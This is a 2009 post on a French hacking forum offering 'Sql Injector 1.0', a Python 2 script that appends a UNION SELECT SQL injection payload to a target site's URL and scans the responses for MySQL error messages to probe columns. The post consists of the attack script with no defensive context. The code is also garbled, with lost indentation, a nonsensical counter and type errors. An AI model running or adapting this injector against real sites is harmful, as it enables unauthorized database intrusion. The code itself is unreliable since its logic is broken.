Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: Sql Injector ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
Nostradamus
Membre
Membre

Hors ligne

Inscrit le: 26 Nov 2009
Messages: 33

MessagePosté le: Ven 11 Déc - 16:17 (2009)    Sujet du message: Sql Injector Répondre en citant

import sys,os,re,urllib,urllib2,socket

if len(sys.argv)<2:
print "\n beenudel1986[at]gmail[dot]com"
print "\n\tSql Injector 1.0"
print "\n Usage: sqlinjector.py <site>"
sys.exit(0)

host=sys.argv[1]
var1="/*"
ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist"]
payload="-1+union+select+1"
site=host+payload
for i in range(1,100): # column number range
try:
attack= urllib2.urlopen(site+var1, "80").readlines()
print "Trying Payload: ",site+var1,"\n"
j=1+1
for line in attack:
if re.search("Warning: mysql_fetch_row()",line):
print "\n Trying Next"
site=site+payload+j
break


except(urllib2.URLError, socket.timeout, socket.gaierror, socket.error):
pass
except(KeyboardInterrupt):

pass


Revenir en haut
Publicité






MessagePosté le: Ven 11 Déc - 16:17 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Portail | Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com